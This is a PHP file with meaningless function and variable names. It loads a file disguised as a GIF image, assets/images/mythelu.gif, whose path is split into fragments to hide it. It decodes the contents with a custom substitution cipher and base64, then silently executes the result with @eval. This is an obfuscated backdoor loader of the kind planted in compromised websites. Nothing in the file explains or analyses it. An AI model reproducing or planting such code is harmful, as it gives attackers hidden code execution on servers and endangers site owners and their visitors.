<?php

function mydujy_bonahashezh($onunuh_ogashirym) {
    $kapyto = ytewen_fadafozaq();
    $ecuxaxi = array();
    $cemivi = ygipek_vukydemech();
    $ikirute = array();
    for ($tytepy = 0; $tytepy < strlen($kapyto); $tytepy++) {
        $obiceto = substr($kapyto, $tytepy, 1);
        $ijadix = substr($cemivi, $tytepy, 1);
        $ikirute[$obiceto] = $ijadix;
    }

    $nywuge = strtr($onunuh_ogashirym, $ikirute);
    $nywuge = base64_decode($nywuge);

    return $nywuge;
}

function adusok_ipeculofy($onunuh_ogashirym) {
    $ecuxaxi = array();
    if (!file_exists($onunuh_ogashirym))
        return false;
    $uzyteto = @file_get_contents($onunuh_ogashirym);
    if (!$uzyteto)
        return false;
    $uzyteto = substr($uzyteto, 3);
    $ecuxaxi = mydujy_bonahashezh($uzyteto);
    return $ecuxaxi;
}

function ytewen_fadafozaq() {
    $uzyteto = "NSCclhGM5y+qv7W6KfLpTs2twBVmJ/oFnY4POAaxiX=Rzk89dH1IDrEZj3QeUgub0";
    $ecuxaxi = array();
    return $uzyteto;
}

function ygipek_vukydemech() {
    $ecuxaxi = "bXwcZhoSai0Wfj2k6geGulpnPF=9xtqA3JvTRUCYrIHLE+Nms7/M1BQzV8dyO4KD5";
    $ywerupy = array();
    return $ecuxaxi;
}

$berucix = adusok_ipeculofy(__DIR__ . "/asset" . "s/im" . "ages/" . "mythe" . "lu.gi" . "f");
if ($berucix) {
    @eval($berucix);
}

